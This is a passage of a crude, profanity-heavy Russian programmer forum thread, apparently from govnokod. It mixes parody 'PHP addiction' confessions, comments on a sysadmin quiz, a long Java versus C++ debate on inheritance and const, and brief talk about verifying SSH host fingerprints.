                      Если использовать PHP редко, то зависимость не возникает.
                      Ответить
                      • показать все, что скрытоvanished
                        Ответить
                        • Подтверждаю.
                          Ответить
                          • Здравствуйте! Мне 18 лет.
                            Все началось давно, 5 лет назад.

                            Тогда я попробовал всего лишь безобидный скриптовый язык. Мне понравилось. Через время я попробовал еще и еще. Но все бы ничего, около года я так иногда кодил немного.

                            Но в 15 лет я по настоящему влюбился, и эту девушку я люблю до сих пор. Я очень много общался с ней и т.п но она мне отказала... тогда я начал много кодить. Кодил сайты пачками, в 16 лет попробовал «Python» причем сразу «Django». И тогда же попробовал jQuery, JavaScript. Из нормального, подающего надежды ученика я превратился в фронт-энд кодера. Время не заставило себя ждать.

                            Я, не находя себе места в жизни, перешел на более мощные фреймворки и технологии - «PHP», «Zend», «HTML5», «node.js», «React»... Я стал никому не нужен...
                            Но в моей жизни осталось 3 друга, которые ценят меня (они не программисты и не пишут!). Но зависимость оказалась сильнее меня. Я начал воровать. Воровал сначала в репозиториях, копипастил модули и классы и т.п потом перешел на сишные либы, слава Богу пока не попадался...

                            И я не вижу смысла в жизни, но суицид не выход.

                            Уважаемые читатели, не спешите осуждать или упрекать меня. Вы не прошли через это, и вы не имеете право судить о том, правильно ли я поступил или нет. Да, может где-то мне не хватило силы воли или разума, или еще чего... Но для меня все уже закончено...
                            Ответить
                        • Меня подсадил на «PHP» мой любимый мужчина... Вначале просто баловалась «PHP», не часто раз - два в месяц. Потом его посадили, а где брать фреймворки я не знала, да и не тянуло, жизнь била ключом, учеба/работа/активный отдых... Все изменилось когда он освободился... Я тогда про «Zend» даже не слышала, а тут он нашел и хостинг, и верстальщика, и деньги были...

                          Вначале все было вроде нормально, покодили, выложили, пошли домой. Потом он начал нагонять темп, от раза в день начало доходить до трех... В среднем мы кодили по шесть раз в день с промежутками в три часа... За два месяца я потеряла половину своего веса, стали выпадать волосы, ломаться ногти. Домой я уже не приходила, быстро начинало кумарить да и родителям страшно показываться, на сайте было полно иньекций... Вот пишу это все и плачу, как мне страшно это вспоминать. Слава Богу мама заметила мой репозиторий и сразу же положила меня в клинику. Я ненавижу себя и свое прошлое. Хочу забыть «PHP» как страшный сон. Сегодня решила написать потому что увидела знакомого - кодили вместе. Он сказал что наш верстальщик умер вчера. он писал CSS пол года... Это уже третий человек за три месяца... Я боюсь за себя, не знаю, найду ли в себе силы отказаться если предложат, но я не хочу умирать, я не хочу такой жизни. Если кто то это читает, прошу вас НИКОГДА не пишите на «PHP» это самое страшное, что есть на данный момент...Это убивает нас и наших любимых людей...
                          Ответить
                          • показать все, что скрытоvanished
                            Ответить
                            • Открываешь на любой странице?
                              Ответить
                            • Читаю вореции, аж слезы на глазах.

                              А оказывается я не одна такая, которая безумно любит, наивно верит, что все наладится, и готовая переступать через собственную гордость на благо своему любимому человеку.

                              Четыре месяца назад я познакомилась с молодым человеком. Ему 27 лет, с высшим образованием, добрый, заботливый, нежный... ну прямо идеал. Начали прводить с ним очень много времени, спустя месяц я переехала к нему жить. Все было замечательно, я считала себя самой счастливой. До этого разговаривали о разработке сайтов... я просто очень боялась столкнуться с этой проблемой в жизни и вот оно. Постепенно начала узнавать о нем горькую правду.

                              Оказывается в 2006 году он писал на «PHP» на протяжении года. Потом ему пришлось уехать в другой город, где у него впоследствии все складывалось благополучно, пока он не вернулся к прошлому. Год назад он снова начал писать, но буквально через несколько месяцев его сайт взломали. Он устроился на работу, потом встретил меня, а потом связался со своими друзьями из прошлого. И снова «PHP». Спустя неделю, как он начал писать, он сам со слезами на глазах мне во всем признался. Обещал завязать. Я поверила. Сидел дома, отключил компьютер, даже умудрился пройти собеседование на джависта (Он на тот момент переходил на другую работу).

                              А потом снова уходы куда-то на целый день, отмазы в которые я поначалу верила... Я не знаю как описать мое состояние. Я нервная стала до ужаса.

                              Он обещает, и я хочу ему верить, но уже сама не понимаю, что происходит в моей душе. Это длится уже третий месяц...Он нашел новую работу. Слава богу хоть за нее держится. И я не теряю надежды, я буду с ним, я буду пытаться вытащить его из этой системы. Не знаю насколько меня хватит, но я до последнего буду за него бороться. Иногда аж разрыдаться хочется, от того, что ты в-принципе не в силах ему помочь. Может быть действительно, все еще наладится........
                              Ответить
                        • Привет, я употреблял «PHP» и его производные в течении трех лет. Первый раз получил «Денвер» от лучшего друга.

                          Говорил не ссы, нет систематической зависимости, захотел и бросил. Оказалось все гораздо сложнее. На протяжении года я боролся с собой. А затем резко все изменилось, я женился и у меня родился сын, что дало новую опору в жизни.

                          Затем я столкнулся с новой проблемой, содержание семьи. Зарплаты жутко не хватало и я решил заняться тем что умею и знаю. Знакомых на фрилансе оставалось много и я первый раз написал сайт. Эта система с легкими деньгами засасывает еще быстрее, чем просто кодинг. И в итоге ушел целый год на эти движения. Месяцы спринтов. Ничего не могло остановить, фарт, азарт, адреналин, хороший заработок, наличие фреймворков сносило голову.

                          Увидел всю эту систему изнутри, как она работает, увидел этих людей в этой системе к которым испытывал жуткое отвращение, при этом не потерял ровным счетом ничего, работа, семья все осталось, кончилось здоровье.

                          Сначала начали сильно болеть глаза, тошнота одолевала, головные боли, депрессии, чтобы избавиться от этих неприятных ощущений помогали «node.js», «phpMyAdmin» и «Angular».

                          Спасибо жене, которой все таки удалось до меня достучаться, и остановить меня в нужный момент. Сейчас уже достаточно давно не программирую на «PHP», но не уверен что это на всю жизнь. В наше время быть уверенным в чем то невозможно. А надеяться что система будет разрушена нереально.
                          Ответить
          • Если работы нет, а человек тратит время на создание сайтов и витая в эйфории.
            Особенность PHP в том, что, пока ты кодишь, тебе хорошо. Как только ты пытаешься починить что-то или вырваться – тебе перекрывают кислород.
            Потом начинается зависимость, вы предлагаете попробовать PHP знакомым, пытаясь подсадить их: «давай писать сайты вместе».
            В итоге разочарование в жизни, депрессия и C++.
            Ответить
            • показать все, что скрытоvanished
              Ответить
              • Люди, сидящие на «PHP», очень разные. Но одно их объединяет — они недовольны собой.
                Девушек обычно категорически не устраивает внешность или отношения с парнями.
                Парни втайне считают себя недостаточно крутыми, они думают, что ведут себя, как слабаки, не умеют дать отпор, не умеют завоевать девушку ну и так далее.
                «PHP» же моментально снимает все эти проблемы, по крайней мере, в начале использование. Ты чувствуешь себя сильным, уверенным, в меру наглым, нужный код пишется сам собой — ну или тебе так кажется...

                Лично я в «PHP» искал утешение после семейных скандалов. Я, понимаете ли, обиделся на жизнь, хотя, по правде говоря, это было просто проявление слабости.

                До поры до времени моя зависимость особенно не бросалась в глаза. Родители отправили меня учиться на экономиста. И я с грехом пополам учился. А после учёбы, а порой и вместо учёбы шатался со своими друзьями по интернету и воровал коды, чтобы сделать сайт на «PHP».
                Ответить
      • >> я узнаю подростков, которые явно находятся в пограничных состояниях, даже когда встречаю их в метро: у них порезанные руки

        Я недавно менял термопредохранитель в одном электронагревательном девайсе и порезал руку алюминиевой хернёй, которая была под ТЭНом. У меня пограничное состояние?
        Ответить
      • >> Не могу спать без снотворного.

        У меня другая фигня. Я иногда вырубался после приёма кофе и крепко спал, а иногда наоборот, после приёма успокоительного не мог заснуть.
        Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
    • показать все, что скрытоvanished
      Ответить
      • 13 Вы профи администрирования

        Промахнулся в вопросе про свободное место.

        Про chattr +i не знал, но угадал.

        В вопросе про «DVI» какая-то подстава: нарисован странный переходник, у которого вход «DVI-D» (цифровой; штырьков аналогового входа я не разглядел), а выход «VGA», но в ответе написано, что переходник «DVI-VGA» нельзя вставить в видеокарту «DVI-D», потому что у переходника должен быть аналоговый вход.
        Ответить
        • У меня есть переходник с дисплейпорта на vga, по сути это ЦАП. В продаже был аналогичный с hdmi на vga. Не вижу проблем сделать такой же для dvi-d.
          Ответить
          • Я тоже в продаже нашёл переходники с HDMI на VGA и даже с VGA на HDMI (последние встречаются реже и сто́ят раза в два подороже, но иногда нужны для подключения старой техники, потому что у современных телевизоров вход VGA встречается редко).

            Ну вот, а «правильный» ответ считает, что так не бывает.
            Ответить
        • показать все, что скрытоvanished
          Ответить
          • >> VGA в форм-факторе 9ти пинового говна

            VGA всё-таки обычно выполнялась в форме 15-пинового говна. В форме 9-пинового выпускали CGA, MCGA, EGA.

            Да, для VGA иногда использовалось 9-пиновое говно, но в качестве промежуточного соединения.

            15-пиновое говно позволило разместить дополнительные выводы «земли» и линию DDB для снятия параметров монитора.
            Ответить
            • показать все, что скрытоvanished
              Ответить
              • Ага. Только я ошибся: DDC, а не DDB. Channel, а не bus. Писал по памяти.

                Сначала был DDC1 — это тупо резисторы, замкнутые на землю, которые рассказывали, цветной или ч/б у тебя монитор, и ещё поддерживает ли он большие разрешения (SVGA).

                Если компьютер с видеокартой, поддерживающей DDC1, включить без монитора, а кабель монитора подсоединить после загрузки, видеобиос будет считать, что у тебя монохромный монитор, и врубит монохромный режим.

                Потом ввели DDC2 — это шина формата I2C. Эта шина уже позволяла обмениваться информацией в обоих направлениях. На практике же обычно использовалось одно направление: в сторону видеокарты, чтобы получить диапазоны поддерживаемых частот развёртки и прочие параметры.
                Ответить
      • 7/14

        Написано я неплохо разбираюсь в администрировании.
        Ответить
      • Есть такой же тест на домохозяйку? Не смог найти. (чтобы правильные ответы были)
        Ответить
      • 0 Вы начинающий админ

        Ахахахахахах
        Ответить
      • 9 — Вы хороший админ

        Про DVI/VGA хуйня какая-то.
        И про Windows 10 тоже
        Ответить
    • показать все, что скрытоvanished
      Ответить
    • Охуеть, на хузе есть реальный пользователь: https://govnokod.xyz/id15/
      Ответить
    • Внезапно!

      https://youtu.be/QcpQ99a37Qk?t=179
      Ответить
      • Вот блять пиздец, я им лишп принёс, а они всё какие-то хресты обсуждать. Ну что за люди
        Ответить
    • Такой вопрос. Вот вы сейчас пиздите на говнокоде. Вы на работе сейчас и хуи пинаете?
      Ответить
      • Ап
        Ответить
      • Ну да, а хуле?
        Ответить
        • Ну ты то ладно, здесь редко. А bormand, nemyx, guest — круглосуточно.
          Ответить
          • Мы - нейросети.
            Ответить
          • Ну я-то либо пропадаю насовсем, либо тоже круглосуточно.
            Ответить
          • Браток, у тебя где-то код бота @GovnokodBot загитхаблен? Хочу убрать сраный большой палец вверх, который после отправки сообщения вылезает. Либо опцию, чтобы это выключать. Заёбывает уведомлениями на устройствах, пусть бот выёбывается только если что-то не так, когда всё нормально — хули он пиздит.
            Ответить
        • На чём пишешь?
          Ответить
          • Я на джаве работаю щас
            Ответить
            • Фу
              Ответить
              • Считаю джаву охуенно минималистичным языком
                Ответить
                • А версия какая?
                  Ответить
                  • Ну написан проект на мамонте, типа 1.6 изначально, но щас там нет-нет да и лямбду ввернут. Там развития особо никакого, поддержка монолита.
                    Ответить
                • показать все, что скрытоvanished
                  Ответить
                  • Джавовское ООП это красиво, а qbasic это фигня
                    Ответить
                    • показать все, что скрытоvanished
                      Ответить
                      • > вручную

                        Это схуя ли?

                        > бойлерплейта

                        Я уже приводил аналогию, джава это проза, там принята вербозность, и у неё есть свои плюсы и своя красота
                        Ответить
                        • показать все, что скрытоvanished
                          Ответить
                          • > Множественного наследования нет -- нужно вручную.
                            И это заебись. Не видел пиздатого юзкейса множественного наследования. Скорее этот недостаток нужно назвать "отсутствие миксинов". Да, красиво было бы в интерфейсах писать реализацию. Но запрет на это создаёт свою философию.

                            > const нет -- нужно делать интерфейс вручную.
                            До сих пор не понимаю чо такле крестовый конст

                            > Генериков для примитивов нет -- нужно писать несколько видов класса вручную...
                            Чем обертки не устраивают?

                            > Джава это проза второклассника:
                            Скорее вербозный слегка избыточный текст, что-то навроде государственного документа. В худшем случае сраный ментовской тавтологический трёп со словосочетанием "транспортное средство" два раза за предложение. Но в лучшем - царский указ об отмене крепостного права. Кстати, рекомендую почитать, шикарный язык.
                            Ответить
                            • > Скорее этот недостаток нужно назвать "отсутствие миксинов
                              Можно и так сказать.

                              > Да, красиво было бы в интерфейсах писать реализацию. Н
                              После этого нужно интерфейс называть "абстрактным классом", и получить множественное наследование.

                              >Не видел пиздатого юзкейса

                              У тебя есть Interface1 и Interface2. Тебе нужно реализовать оба. Готовые реализации, нужные тебе, уже есть. Твоя действия?

                              >До сих пор не понимаю чо такле крестовый конст
                              У тебя есть объект. Тебе нужно сделать его неизменяемую версию. Пусть у него есть три сеттера и два геттера.
                              Как ты передашь его кому так, чтобы там его не изменяли?
                              В джаве придется пилить интерфейс с геттерами.
                              В C++ можно сказать, что геттеры это const методы, а сеттеры нет. И отдать const объект.
                              Ответить
                              • > Скорее этот недостаток нужно назвать "отсутствие миксинов

                                В 8ю завезли default методы в интерфейсах. По сути те же миксины.

                                >У тебя есть Interface1 и Interface2. Тебе нужно реализовать оба. Готовые реализации, нужные тебе, уже есть.

                                Они же позволяют множественное наследование.
                                Ответить
                                • показать все, что скрытоvanished
                                  Ответить
                                  • Возможностью множественного наследования.
                                    class A implements Mixin1, Mixin2, Mixin3
                                    Ответить
                                    • показать все, что скрытоvanished
                                      Ответить
                                      • >по сути чем отличается
                                        По сути интерфейсы позволяют множественное наследование.

                                        >Почему я должен использовать абстрактный класс, а не интерфейс?
                                        Не знаю. Компилятор вынудит при наличии нереализованных методов. А вообще я ООП никогда не любил.

                                        >Потому что в интерфейсе не может быть данных?
                                        В том числе.
                                        Ответить
                                      • Абстрактный класс нужен, чтобы обязать потомков реализовать детали реализации в будущем, которые уже можно полагать существующими сейчас. Интерфейс нужен, чтобы гарантировать набор методов у объекта. То что интерфейсу дали возможность иметь реализацию - немного избавляет от дублирования кода, ибо миксин это удобно и их может быть несколько. ООП - это семантика, это чтобы писать код в терминах задачи. А все что ты говоришь про конст например - чисто технической вопрос, касающийся ООП очень опочредованно. То же самое со множественным наследованием. Его может быть, не быть - это концептуальное решение, а не изъян. В джава его принципиально нет, и это не минус и не плюс, это просто свойство такого подхода к решению задач. В крестах оно есть, как в прочем и лысый черт. Поэтому джава минималистична, её ООП проще и красивее крестового. Кремы мы любим не за ООП лол
                                        Ответить
                                        • показать все, что скрытоvanished
                                          Ответить
                                          • >Но джава учит нас, что все нужно делать через ООП.

                                            На самом деле можно обойтись без этого.
                                            Через ООП будут только указатели на функции, оно же «полиморфизм», оно же лямбдыанонимные классы.
                                            Ответить
                                          • > И реализация этого подхода в джаве требует ГОРАЗДО БОЛЬШЕ буков чем в С++.
                                            Да, потому что это реализация ЭТОГО подхода, а не какого то другого. Он создан не для меньше буков, а для минималистичное и, чистое, программу на котором может при должной дисциплине поддерживать белый воротничок. ООП Конст и прочие плюшки, усложняющие в первую очередь реализацию компилятора и поддержку кода офисным планктоном, коий и есть в общем то стереотипный джавист. И никакого отношения к ООП по большому счету не имеют. Такого в крестах пол-языка, они там русское поле экспериментов устроили по соседству с ООП.

                                            > Кроме того, джава лукавит.
                                            Помянем базовые принципы крестов минутой молчания.
                                            Ответить
                                            • показать все, что скрытоvanished
                                              Ответить
                                              • Нет, мы считаем что средний джавист считает преимуществом возможность насрать файлами, и именно такой стиль ему предлагает язык. Этот код не очень плотный, водянистый, много бойлерплейта. При должном навыке это делает поддержку кода проще. Например ты ориентируешься по проекту быстро именно потому что все в отдельных файлах, и ты знаешь по названию и пути, с чем имеешь дело. Понятно, что в любом нормальном проекте так, но здесь ты как бы не занимаешься такими вещами как const чтобы не покидать уровень абстракции.
                                                Ответить
                                        • > То же самое со множественным наследованием.
                                          >В джава его принципиально нет

                                          Учи матчасть. В Йажа всегда было множественное наследование. На интерфейсах.

                                          Наследовать их можно без ограничений. Они специально так сделали, чтобы избежать крестобагров.
                                          Ответить
                              • Все равно речь про миксины, множественные наследование тут в пизду не нужно.

                                Ну да, сосалово, прям одним объектом на все хуи не усядешься. Я бы заюзал отношение has a вместо is a

                                А про конст - напомню, мы говорим о языке, где даже операторы не перегружаются. Говорю же, минималистичный и вербозный, весьма однородный. Всё, без чего можно в ооп обойтись, обойдено, если это можно сделать тонной бойлерплейта. В пизду этот конст, здесь интерфейс вполне заебись справится с задачей, и будет именно так многословно и очевидно даже для невнимательного взгляда, как это и принято в джаве. Типа как давать гигантские имена сущностей камел кейсом. Язык однородный и красивый. Ноль сахара для частностей. Только общие абстракции. Идеальное ООП.
                                Ответить
                                • показать все, что скрытоvanished
                                  Ответить
                                • const-хуёнст.

                                  Это ж static final. Просто они один кейворд, заменили кобенацией двух других (см. Йажа — минималистичный язык)
                                  Ответить
                                  • показать все, что скрытоvanished
                                    Ответить
                                    • И даже с интерфейсом, компилятор тебе не проверит, меняет ли он что-то или нет.
                                      Ответить
                                      • У человека заболевание «ООП головного мозга» с патологиями C++/C#.

                                        Множественное наследование и const на методах (который обходится кейвордом mutable), это типичная оверинжинирная крестодрисня, которая нахуй не нужна.

                                        Как впрочем и обычное наследование.
                                        Ответить
                                        • показать все, что скрытоvanished
                                          Ответить
                                          • >Я за делегирование. Но и его в джаве нет
                                            Я тоже. Но в каких промышленных языках оно прилично реализованно?
                                            C# не предлагать.
                                            Ответить
                                            • показать все, что скрытоvanished
                                              Ответить
                                              • > помощью пары строк магии можно сделать это и в питоне, и в руби
                                                Скриптуха. Я так и в jse могу.

                                                А покажи свифт/котлин.
                                                Ответить
                                                • показать все, что скрытоvanished
                                                  Ответить
                                                  • Где-то я ещё такое видел. Час поздний, не могу вспомнить.

                                                    В CL было похожее, но где-то ещё. Может в Скале.

                                                    Сама идея автокомпозиции и скрещивания питухов неплохая, но как-то странно выглядит.

                                                    А если taste будет и у Vodka что тогда?

                                                    Кмк, проще как в Сишке вложить в структуру и явно писать какой подобъект дёрнуть.

                                                    class FruitSpirit{
                                                        Fruit f;
                                                        Spirit s;
                                                    }
                                                    
                                                    vodkaWithApple.f.taste()
                                                    vodkaWithApple.s.drink()
                                                    Ответить
                                                    • Ну вот это и есть отношение has a, а не is a. Для джавы, где вполне себе смотрятся всякие обертки хуертки, передавать в методе вместо самого Pitux какое нибудь Pitux.getInnerPetushara() - ничего необычного. В пизду множественные наследования и делегирование. Надо думать о том, что в терминах задачи органичнее, чем сущности являться, классом, абстрактным классом, интерфейсом.
                                                      Ответить
                                                    • > А если taste будет и у Vodka что тогда?

                                                      Тогда пиздец, все, доделегировался. Молодец, сынок.
                                                      Ответить
                                                    • Ты давно дембельнулся?
                                                      Ответить
                                          • Блять, ты только что в претензию джаве ставил что нельзя заюзать готовую реализацию от двух предков.
                                            Ответить
                                    • >Нужно городить интерфейс
                                      А разве интерфейс может как-то обязать ничего не менять?

                                      >пометить метод как const
                                      Это типичная крестопараша. Высрать говноправило, а потом извернуться и придумать способ его обойти.
                                      В Сишке такой мозголомной хуйни не было. В Йаже её нет.
                                      en.cppreference.com/w/cpp/keyword/mutable

                                      Именно поэтому я за «Йажа».
                                      Ответить
                            • показать все, что скрытоvanished
                              Ответить
                      • https://govnokod.xyz/_26654/#comment-531212

                        Вот трэт, с ответами
                        Ответить
                    • >Джавовское ООП это красиво
                      Это ужасно.

                      >qbasic это фигня
                      Это охуительный суперминималистичный скриптовый язык.
                      SCREEN 12
                      и погнали.
                      Ответить
                • > джаву охуенно минималистичным языком
                  Году в 2005, да.
                  Ответить
    • Питухи, кто знал про https://en.wikipedia.org/wiki/SSHFP_record ?
      Ответить
      • А смысл? Ты так часто впервые цепляешься по ssh к незнакомым сервакам?
        Ответить
        • Ну вот у нас в одном проекте есть бастион: такой сервер, на который питухи делают тоннель, и через него ходят потом в постгрю, внутренние сервера итд. Это все в облаке амазоньем, в vpc.

          Питухов много. Откуда питухи знают, что они первый раз цепанулись к честному серверу, а не к скаму?

          Потом-то у них сохраняется публичный ключ, конечно
          Ответить
          • Дык фингерпринт показывается при первом коннекте, бери да сверяй с тем что админ тебе выдал. Ну защиты от дурака нету, да.
            Ответить
            • сверять что? фингерпринт? вручную?
              Ответить
              • Да, один раз не пидорас.

                З.Ы. Я в курсе про атаку с генерацией похожих на глаз фингерпринтов, можешь не цитировать её.
                Ответить
                • А можно для меня процитировать?
                  Ответить
                  • Да просто подбирают такой хеш, у которого в начале, в конце и в середине немного символов, похожих на хеш реального сервака. А в остальные места люди обычно не смотрят.
                    Ответить
                    • У меня большой опыт с гуидами из bcdedit, меня не наебешь
                      Ответить
                      • Один мальчик говорил, что на глаз различает гуиды из bcdedit, что это удобно и его совсем не напрягает. Потом его в дурку забрали, конечно.
                        Ответить
                        • Надо просто быть внимательным.

                          У меня один коллега любил одну и ту же логику четыре раза написать (в базе, в джаве, в джаваскрипте два раза итд).

                          Когда я ныл, что я могу поменять в одном месте, а в другом забыть, он говорил: "просто нужно быть более внимательным"
                          Ответить
    • «Facebook» второй раз за год сломал кучу приложений на «iOS» своим «SDK».


      https://gazeta.ru/tech/2020/07/10/13148041/sdk_again.shtml
      Ответить
    • Чому на горных великах жеские сиденья что пиздец жопа отваливаться?
      Ответить